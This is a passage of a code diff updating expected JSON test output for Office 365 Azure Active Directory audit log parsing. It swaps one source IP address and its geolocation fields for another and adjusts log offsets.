 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2849,20 +2815,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2873,8 +2837,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:52.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -2889,7 +2853,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 91928,
+ "log.offset": 91892,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2918,9 +2882,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:52",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2996,20 +2960,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3020,8 +2982,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:52.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3036,7 +2998,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 97179,
+ "log.offset": 97141,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3065,9 +3027,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:52",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3143,20 +3105,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3167,8 +3127,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:52.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3183,7 +3143,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 102430,
+ "log.offset": 102390,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3212,9 +3172,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:52",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3299,20 +3259,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3323,8 +3281,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:25:54.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3339,7 +3297,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 106341,
+ "log.offset": 106299,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3368,9 +3326,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:25:54",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3446,20 +3404,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3470,8 +3426,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:25:54.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3486,7 +3442,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 111772,
+ "log.offset": 111728,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3515,9 +3471,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:25:54",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3593,20 +3549,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3617,8 +3571,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:25:54.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3633,7 +3587,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 117203,
+ "log.offset": 117157,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3662,9 +3616,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:25:54",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3740,20 +3694,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3764,8 +3716,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:25:54.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3780,7 +3732,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 122634,
+ "log.offset": 122586,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3809,9 +3761,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:25:54",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3896,20 +3848,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -3920,8 +3870,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -3936,7 +3886,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 126545,
+ "log.offset": 126495,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -3965,9 +3915,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4059,20 +4009,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4083,8 +4031,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4099,7 +4047,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 131695,
+ "log.offset": 131643,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4128,9 +4076,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4222,20 +4170,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4246,8 +4192,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4262,7 +4208,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 136845,
+ "log.offset": 136791,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4291,9 +4237,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4385,20 +4331,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4409,8 +4353,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4425,7 +4369,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 141995,
+ "log.offset": 141939,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4454,9 +4398,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4548,20 +4492,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4572,8 +4514,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4588,7 +4530,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 147145,
+ "log.offset": 147087,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4617,9 +4559,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4711,20 +4653,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
